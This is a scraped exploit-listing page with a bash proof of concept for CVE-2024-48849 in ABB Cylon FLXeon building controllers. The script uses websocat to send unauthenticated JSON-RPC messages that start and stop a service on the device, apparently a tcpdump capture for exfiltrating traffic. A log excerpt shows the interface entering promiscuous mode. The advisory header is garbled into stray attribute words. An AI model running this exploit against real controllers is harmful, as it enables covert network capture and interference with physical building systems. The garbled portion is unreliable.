Exploit for ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC CVE-2024-48849

Name: Exploit for ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC CVE-2024-48849
Rating: 5 (137 reviews)
2025-02-07 | CVSS 8.8
## https://sploitus.com/exploit?id=ZSL-2025-5913
<html><body><p>#!/bin/bash
&lt;<eoc .="" .-="" .--="" .---="" ._____="" _="" _.="" ___="" ____="" a="" abb="" advisory="" affected="" air="" allowing="" allows="" amplifying="" an="" and="" are="" as="" aspect="" attack="" attacker="" authentication="" automation="" bacnet="" be="" boilers="" building="" by="" c="" can="" capture="" captures="" cat="" cbt="" cbv="" cbx="" central="" chillers="" command="" command.="" conditions="" connectivity="" continuously="" control="" controller="" controllers="" controllers.="" cooling="" cve="" cve-2024-48849="" cylon="" data="" deliver="" denial="" desc:="" designed="" device="" discovered="" diverse="" drives="" e="" echo="" electrical="" eoc="" eof="" equipment="" execute="" exfiltration.="" exhaustion="" exit="" exploit="" exploited="" express="" fbti="" fbvi="" features="" fi="" field="" filters="" firmware:="" flxeon="" for="" frequency="" functions.="" gjoko="" handling="" heat="" https:="" hvac="" id:="" if="" impact.="" implementation="" in="" instances="" integra="" integration="" intelligent="" interface="" ip="" is="" it="" j="" jsonrpc="" kernel="" krstic="" lack="" leading="" lighting="" linux="" loop="" ltd.="" management="" metering.="" modular="" ms="" multi-zone="" multiple="" network="" new="" nodejs="" o="" of="" on="" on:="" open="" p="" page:="" pid="$!" plant="" poc="" portfolio="" ports="" potential="" processes="" product="" pump="" r="" range="" relevant="" resource="" rooftop="" scalable="" sending="" serial="" series="" service="" services.="" smart="" smartrouter="" solutions.="" spawn="" spawning="" standards="" start="" start_service="`echo" stop_service="`echo" such="" summary:="" systems="" systems.="" t="" target="wss://$IP:443/ws" tcpdump="" tested="" that="" the="" then="" this="" to="" towers="" traffic="" unauthenticated="" unauthorized="" units="" unprecedented="" url:="" users="" uses="" variable="" vendor:="" version:="" volume="" vulnerability="" vulnerable="" web="" websocket="" which="" you="" your="" zsl-2025-5913=""> $START_SERVICE\n"
sleep 1
echo "$START_SERVICE"|
websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v
sleep 2
echo -e "\n[+] Sending JSONRPC =&gt; $STOP_SERVICE\n"
sleep 1
echo "$STOP_SERVICE"|
websocat -k -1 -B 251 -n "$TARGET" -v
echo -e "\n[*] Done"

&lt;&lt; "LOG"
$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager &gt;log.txt; split -n 4 log.txt
$ cat /usr/local/aam/var/xaa
$ cat /usr/local/aam/var/xab
$ cat /usr/local/aam/var/xac
$ cat /usr/local/aam/var/xad
...
#Apr 21 23:12:51 kernel: device lo left promiscuous mode
#Apr 21 23:12:34 kernel: device lo entered promiscuous mode
#Apr 21 23:12:34 node[196]: ws connect
...
LOG
</eoc></p></body></html>